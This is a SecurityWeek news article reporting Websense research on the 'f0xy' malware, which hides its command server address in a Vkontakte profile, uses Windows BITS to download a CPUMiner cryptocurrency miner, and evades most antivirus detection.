Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

New “F0xy” Malware Uses Clever Techniques to Stay Hidden

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

The threat has been dubbed “f0xy” not only because it’s cunning like a fox, but also because this particular string has been found in its executables and the registries it creates for persistence.

The earliest samples identified by researchers are dated January 13, 2015, but the malware has been enhanced by its creators since. Initial variants only worked on Windows Vista and later versions of Microsoft’s operating system, but newer variants also work on Windows XP, Websense said.

The initial dropper was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by Websense. The detection rate has increased since, but it’s still fairly low.

According to researchers, the developers of f0xy chose not to obfuscate the malware’s code, most likely in an effort to make it look more legitimate and avoid raising suspicion.

Another method used to hide the presence of the threat involves the Russian social media website Vkontakte. The malware contains an encoded string that hides a URL pointing to a certain Vkontakte profile. An encoded string posted on the said profile as a comment contains the URL for the command and control (C&C) server used by the malware.

Once the f0xy downloader finds itself on a computer, it leverages the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. BITS is designed for transferring files between a client and a server using idle network bandwidth. The component is leveraged by services like Windows Defender and Windows Update.

Advertisement. Scroll to continue reading.

“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense researcher Nick Griffin wrote in a blog post.

In this case, the malware calls the bitsadmin executable directly to specify the parameters for the file transfer (source and destination of the file). However, experts have pointed out that the transfer can be made even stealthier by interacting with BITS through the Component Object Model (COM) interface.

The payload spotted by Websense is a 64-bit version of CPUMiner, a popular open source cryptocurrency mining application. The attackers use the CoinMine.pw mining pool to ensure that all the virtual currency mined by the infected machines go to them.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.